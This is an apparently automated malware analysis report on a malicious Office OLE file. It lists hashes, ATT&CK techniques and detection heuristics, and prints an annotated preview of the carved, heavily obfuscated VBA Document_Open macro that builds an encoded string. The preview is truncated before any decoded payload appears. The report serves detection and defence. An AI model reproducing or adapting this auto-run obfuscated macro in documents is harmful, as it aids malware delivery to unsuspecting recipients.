Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bc83cb7291eed86f…

MALICIOUS

Office (OLE)

86.8 KB First seen: 2019-09-30
MD5: 365c2cd0df49f1e046e189f8104ce5e2 SHA-1: b47777707cfe8f58e113212cda3aad531b0f65c8 SHA-256: bc83cb7291eed86f3c80ccc841d9c1ef4a0ce9db16637cd2189c3383560cee95
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing VBA macros, with a high-confidence heuristic for a Document_Open macro. The VBA code is heavily obfuscated (and the extracted preview below is truncated), but its presence and the 'Document_Open' subroutine indicate an attempt to execute code automatically when the document is opened. This is characteristic of macro-based malware delivery, likely intended to download and execute a second-stage payload.

Heuristics 4

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 88,920 bytes but its declared streams total only 36,250 bytes — 52,670 bytes (59%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). Slack of this size can also be left behind by ordinary editing (deleted or rewritten streams leave their old sectors unreferenced), so this finding marks where a payload could be hidden rather than confirming one; inspecting the unallocated sectors is the natural follow-up.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace identifier that Office writes into drawing markup, so it is expected document content rather than a network indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13822 bytes
SHA-256: 65892eb4e160e221bca7f85ebeeced35de9b09ab7d2be4db1bcff0a8a439f59a
Preview script
First 1,000 lines of the extracted script
' --- analyst annotations (report commentary; not part of the carved macros.bas bytes) ---
' Module attributes of the first VBA module. VB_Base = "1Normal.ThisDocument" together
' with VB_TemplateDerived = True marks this as a document-class module derived from the
' Normal template (the ThisDocument module), which is where the Document_Open handler
' below lives.
Attribute VB_Name = "lsaNXrfDLvU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Document_Open: auto-run entry point invoked when the document is opened (the basis
' of the OLE_VBA_DOCOPEN finding above).
' Nearly every statement in this procedure is padding: each If block compares
' identifiers that are never assigned anywhere in the visible code, declares an array
' that is never used, and sums more unassigned identifiers into a variable that is
' never read. Dim is a declaration rather than an executable statement in VBA, so
' wrapping it in an If does not make it conditional.
' The only statement with an observable effect is the qjSwsRTb call in the middle of
' the procedure: it concatenates twelve helper results and passes the string on.
' Three of the helpers (BBbZinEi, AKzLoPq, wNmBjL) are visible below and return
' '['-laden string fragments; qjSwsRTb and the remaining nine identifiers (presumably
' functions of the same shape) lie outside the 1,000-line preview, so what is finally
' done with the assembled string cannot be confirmed from this page.
Private Sub Document_Open()
   If UqsrH >= whidk Then

Dim CHDub()
HAsQRW = PJQHL + smYFTV

End If
   If lWPbXc >= 17 Then

Dim Nmklq()
YFEJj = OuzTq + NOCzs + pZPYIb + NIiwCD
hXVKrm = HrmnCZ + JOHOu + wRGzw + dSzfzv

End If
   If PsVqMo = 5 Then

Dim WvUih()
oVUiWk = GBJhW + OpwOA + ZYLaan + zlBuS

End If
   If OlhBk >= 8 Then

Dim KkjNin()
zajYh = qHUdv + rCkdFH + LBBdHz + Vioszs
TXZEcN = jNtHmH + caGbGr

End If
   If EPjdOq <= WOFEP Then

Dim QIDYWd()
wiZWos = iBjYL + SvdhoH + pmBCH + DVPBv

End If
   If wzZbD >= MTcjDG Then

Dim fLYcu()
fnHWVp = tDhQqA + CabfB + AUuRa + AVzOiz

End If
' The only live statement: the argument is the concatenation of twelve helper results.
' qjSwsRTb is not defined in the visible portion of the macro.
qjSwsRTb (BBbZinEi + AKzLoPq + wNmBjL + vfKIKfU + nGwiSlnEN + svTQklGvS + aKTjzrBzHz + vLhzDAI + cCcDwz + CTnXOPR + ipbElSEI + pCvVE)
   If NdOod > 4 Then

Dim lpnXw()
JzikwJ = bRrti + ZZBhm + njwabu + YiSPWJ

End If
   If oYaGlk >= fRvDIS Then

Dim uKAhzT()
SJuwwk = JGkPDK + sEwcn + UJUnnt + LafWB
wWPjK = zOWKLo + IaBGE + KjNIp + IFNYi

End If
   If aksLtq >= 15 Then

Dim mpPwpz()
fCOXl = bQqvM + FlfEz

End If
End Sub


' Second VBA module: holds the string-fragment helper functions that Document_Open
' concatenates before calling qjSwsRTb.
Attribute VB_Name = "fHaURONz"
' BBbZinEi: returns a string assembled from four locals (aZpivAzl, iOuXOVIsNM,
' ZbCzDcowG, uGAJmz), each itself a '+'-concatenation of short literals. Roughly every
' other character in those literals is '[', which looks like inserted junk or a
' delimiter that a decoder elsewhere strips — presumably; no decoder is in view, so
' the cleartext cannot be stated here.
' The If blocks follow the same padding pattern as Document_Open (unassigned
' identifiers in the condition, an unused Dim, write-only sums) and do not influence
' the return value.
Function BBbZinEi()
If jQzVCd > 18 Then

Dim IizLc()
nvjzv = ucraj + hITsqz

End If
   If CDkjp <> kUCAC Then

Dim bzSmjD()
FiXpp = cUVwP + wLSKkL
KiSZZ = YvRiph + nauff

End If
' First fragment of the return string.
aZpivAzl = "`ja ,S[7[L," + "@ [p[b[q [l[2:" + "[coQ[ o[-[W[ [#[8" + "[5[ [v[4[l" + "[ [+[DO[ [m[I[D" + "[ [b[3[n[ ["
If MsPYm < 4 Then

Dim DcJoi()
jtpmEz = RRLlfO + EXQmf + QjzqD + nhUTH

End If
   If rHcoI <> jvujwl Then

Dim YXwhD()
NMBCvt = MMDZO + PQKCp

End If
   If GcukI > 18 Then

Dim hOdBBG()
JjFfLX = LLwvz + CKRwzD + YIdJmI + zImiv

End If
' Remaining three fragments.
iOuXOVIsNM = "U[$[w[ [m[" + " [M[ [Us@[" + " %[=[?[ [T[4k "
ZbCzDcowG = "[L[;[T[ [V[a?[ [([" + "F[ [ K@[H[ [9[M[f [" + "{[w[R[z[u[V[;[z`S" + "[1x[p%*[e[g[ [W`" + "[_@[e[q[R[ [N^[_.[" + "j`[ ['[;[z[R[z`[8[1["
uGAJmz = "/[![h[H[A[W" + "[^[=[v[l[b[.[j[3o[+[" + "n[^[_[:[=[F[8[3[([y" + "O[I[4T[Q[+[a"
' The function's return value: the four fragments joined in order.
BBbZinEi = aZpivAzl + iOuXOVIsNM + ZbCzDcowG + uGAJmz
   If JcNwL = jlZME Then

Dim zVGqEj()
FXWsVS = VINUGa + iEjoF + rTanqU + CuJUwJ

End If
   If vmjriN = aXEFiP Then

Dim QWBww()
lzjBB = vbwtWw + ijSAw + XMtCjl + TkdnTz
HwzCi = vSDbih + PljwW + WYrsu + QLOKw

End If
End Function
' AKzLoPq: same shape as BBbZinEi — returns three '['-laden string fragments
' (LmvHFUzzhdM, JPTOHibOVdX, hNTioI) joined in order. The If blocks (including the
' ones using Xor and Eqv on unassigned identifiers) are padding and do not affect the
' return value. Note the """" literal in the JPTOHibOVdX assignment, which contributes
' a single double-quote character to the fragment.
Function AKzLoPq()
If jGflP <> HjFIR Then

Dim BcZiB()
QOdoPG = CRijH + QEKZJ
ziEzq = jbXzo + jJTuLt

End If
   If ZiNAdA > CATqDQ Then

Dim DwLQmV()
ffDdsA = lVsRiS + OUEUqV

End If
   If DIkUDF Xor ivGZK Then

Dim CKWkAA()
faZYw = pcHvwz + EcusXw
PmzKEH = MKhkpV + udjLW + QubzK + LpaPdN

End If
' First fragment of the return string.
LmvHFUzzhdM = "[cg[D$[3[!" + "[Y[H[h[ [U[Z[r" + "[j[9[^[4[b[ d[3[q["
If sdPUr <> dRZLG Then

Dim iJwLhB()
bULzAd = vluDXm + OCzUr
tncBnD = cfbDwL + jjhfO

End If
   If Oduilm = lpmVsl Then

Dim KOAKrh()
AVMptw = nrHaOa + VozXm
aRDszD = LDIRKA + OHits

End If
   If wwiuiL <= pZCnE Then

Dim DjSTpp()
njiqQ = ZBNGE + wRbSZz
sdViF = FQzipO + ChtOQ + iPlMbT + IFSbQs

End If
   If RrWWoU > THzrp Then

Dim zorKJ()
hTPJrH = ahiVU + AjcvG
zijIYc = GpOso + VRJcB

End If
' Second fragment; the """" piece is an escaped double-quote character.
JPTOHibOVdX = "W[^[2[F[#e[" + "a[*A[U[i[b[*k" + "[ [h[R[e[Q" + "[l@" + """" + "[.s[U[E[*k[a[" + "=[/[F[Y[_[8" + "[8B[1[D& [h["
If dRFcLK Eqv bXXrzc Then

Dim XNClT()
GQuKH = zzVOz + lFDbJn + USJpEb + jovONH

End If
' Third fragment.
hNTioI = "cO-[v[9[Q+[r[>[g`[*[" + "1[![JS[][ S[([<[" + ")[![^[a[V[C" + "[4[y[W[j[;n[T4[1S[!" + "@[R[A%[w[l[b["
' The function's return value: the three fragments joined in order.
AKzLoPq = LmvHFUzzhdM + JPTOHibOVdX + hNTioI
   If NXuVpK <= GIawN Then

Dim NvDPI()
nwapjH = LCGApq + NqEOS + JRDjdc + JazLww
ZumhL = AzzAI + IpJXrp + WpVttM + WflDv

End If
End Function
Function wNmBjL()
PZRfAWuwYV = "b[*[x[Z[i[W[" + "X[q[f[0[{[r[CO[C" + "[.[a[$[c[:[^[u" + "[v[L[l[5[?[h[i["
If wTEWCE <= 12 Then

Dim KTCYsU()
ADHVBc = DBsVF + UOuEFt + qpSUm + kfBqUT

En
... (truncated)